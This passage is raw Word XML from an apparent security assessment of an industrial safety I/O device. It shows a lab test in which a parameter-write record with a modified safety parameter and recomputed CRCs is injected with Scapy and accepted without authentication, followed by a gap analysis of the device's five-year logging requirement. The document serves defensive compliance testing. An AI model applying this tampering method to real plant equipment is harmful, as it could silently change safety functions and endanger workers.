              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4BDC72" w14:textId="77777777" w:rsidR="0023309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233097" w14:paraId="5344035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491D75" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58FBE9C5" w14:textId="627C8229" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00257CB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TC-RQ011-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="6D7E2ED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3419D43" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D8E0A7" w14:textId="77777777" w:rsidR="0007204B" w:rsidRPr="006E4D50" w:rsidRDefault="0007204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Pi eth0 = 192.168.0.100; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39E3E948" w14:textId="77777777" w:rsidR="0007204B" w:rsidRPr="006E4D50" w:rsidRDefault="0007204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DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0031EFFF" w14:textId="77777777" w:rsidR="0007204B" w:rsidRPr="006E4D50" w:rsidRDefault="0007204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SPS 192.168.0.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="373B0010" w14:textId="777936A3" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="0007204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laptop mirror</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="0343843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D8D850" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A520D0E" w14:textId="77777777" w:rsidR="008F67E0" w:rsidRPr="006E4D50" w:rsidRDefault="008F67E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Scapy </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3273D8" w14:textId="77777777" w:rsidR="008F67E0" w:rsidRPr="006E4D50" w:rsidRDefault="008F67E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 iParCRC/F_ParCRC routine (from TC-RQ005-02); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45EF2AA3" w14:textId="68CBD189" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="008F67E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Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="71BB92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032D82A" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AFAFBC6" w14:textId="77777777" w:rsidR="00605BC8" w:rsidRPr="006E4D50" w:rsidRDefault="00605BC8"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During the param phase, inject an acyclic parameter-write record with a safety-relevant iPar modified and valid recomputed CRCs; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499B9BFA" w14:textId="005AEB21" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00605BC8"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observe acceptance and whether any credential is solicited/verified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="6D4F0EB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79E71" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36600BB6" w14:textId="77777777" w:rsidR="0027700E" w:rsidRPr="006E4D50" w:rsidRDefault="0027700E"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No authentication demanded; acceptance gated only by F_Dest_Add + iParCRC/F_ParCRC (SRIO-1983, SRIO-12627); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D861E8F" w14:textId="14E1D2C8" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="0027700E"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confirms authorization is environmental (SRIO-9402), not device-side.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00AD4B09" w14:paraId="3149CC45"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CF385BA" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="755DF9EC" w14:textId="5AC0657D" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="001855BC"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Write accepted without credential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="4C3ECC2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2E3E84" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E176EE" w14:textId="77777777" w:rsidR="00A8370F" w:rsidRPr="006E4D50" w:rsidRDefault="00A8370F"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TC1103_paramwrite.pcapng, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74DB70FC" w14:textId="77777777" w:rsidR="00A8370F" w:rsidRPr="006E4D50" w:rsidRDefault="00A8370F"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Pi log, PLC/DUT state, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44214AC9" w14:textId="729C64FF" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00A8370F"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cross-ref to TC-RQ005-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D82AAA5" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52244B81" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347DC2E4" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EAFB63" w14:textId="77777777" w:rsidR="008A392A" w:rsidRDefault="008A392A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EDB4E3" w14:textId="77777777" w:rsidR="008A392A" w:rsidRDefault="008A392A" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C105A34" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44758C3E" w14:textId="21858261" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C920A07"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246F8DEE" w14:textId="5D323CCC" w:rsidR="00547898" w:rsidRPr="00547898" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="00547898">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4ACBD" w14:textId="694DE558" w:rsidR="00547898" w:rsidRPr="00547898" w:rsidRDefault="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00547898">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text: The system shall enable a tracing log of data generated in relation to an intervention for five years after the machinery or related product has been placed on the market or put into service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683C139" w14:textId="566B6140" w:rsidR="00547898" w:rsidRPr="00547898" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="00547898">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8, CR 2.9</w:t>
      </w:r>
      <w:r w:rsidR="00C20140">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 2.10, CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17989D7F" w14:textId="7CE5FC8A" w:rsidR="00547898" w:rsidRPr="006E361A" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E361A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="006E361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I (tracing log)</w:t>
      </w:r>
      <w:r w:rsidR="006E361A" w:rsidRPr="006E361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Do</w:t>
      </w:r>
      <w:r w:rsidR="006E361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main Separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DED94B" w14:textId="3248CA53" w:rsidR="00547898" w:rsidRPr="00547898" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="00547898">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9226F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering), </w:t>
      </w:r>
      <w:r w:rsidR="00547898" w:rsidRPr="00547898">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7C46C" w14:textId="77777777" w:rsidR="00F9226F" w:rsidRPr="004B348A" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066389C" w14:textId="7401D721" w:rsidR="004B348A" w:rsidRPr="004B348A" w:rsidRDefault="004B348A" w:rsidP="004B348A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B348A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error Log ≥100 entries (SRIO-10703).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9697FB" w14:textId="5EE20638" w:rsidR="004B348A" w:rsidRPr="004B348A" w:rsidRDefault="004B348A" w:rsidP="004B348A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B348A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Circular buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004B348A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oldest overwritten when full (SRIO-10663).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089633E0" w14:textId="08FD9BE6" w:rsidR="004B348A" w:rsidRPr="00F9226F" w:rsidRDefault="004B348A" w:rsidP="004B348A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B348A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cleared on cold start (SRIO-6521)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004B348A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stated as the deficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDC832" w14:textId="77777777" w:rsidR="00A11880" w:rsidRPr="00A11880" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2354B" w14:textId="3738D3E3" w:rsidR="00C41A17" w:rsidRPr="00C41A17" w:rsidRDefault="00C41A17" w:rsidP="00C41A17">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cold start clears the log (SRIO-6521). Crucially, the device’s own MANDATORY ≤1-year reboot interval (SRIO-1812)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> required to test watchdog/safety functions untestable at runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> forces an annual cold start, so the log is guaranteed to be wiped at least once per year by the device’s own safety-maintenance requirement. The 5-year window is therefore structurally impossible, independent of any attack. (The firmware-install reboot is an additional clearing event </w:t>
      </w:r>
      <w:r w:rsidR="00F9541D" w:rsidRPr="00F9541D">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RQ-008 G-3.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B34AD2" w14:textId="6033F677" w:rsidR="00C41A17" w:rsidRPr="00C41A17" w:rsidRDefault="00C41A17" w:rsidP="00C41A17">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="00F9541D">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A fixed ≥100-entry circular buffer (SRIO-10663) with no timestamp (no RTC; SRIO-15218/15398) means that over five years even a modest event rate overflows the buffer, and the surviving 100 entries cannot be bounded to a 5-year window because they are undatable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17874127" w14:textId="344C3009" w:rsidR="00C41A17" w:rsidRDefault="00C41A17" w:rsidP="00C41A17">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3 (incomplete retained scope)</w:t>
      </w:r>
      <w:r w:rsidR="00F9541D">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A17">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even ignoring deletion/capacity, the retained data is incomplete: software/error events only, no physical-intervention events (RQ-003), only partial config/software markers (RQ-008/009). Cross-reference; the collection-completeness limitation is owned by RQ-003/008/009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0951B2" w14:textId="77777777" w:rsidR="00653E02" w:rsidRDefault="00653E02" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E96E8D" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7459D41D" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7D9CD2" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE909B8" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54595C54" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
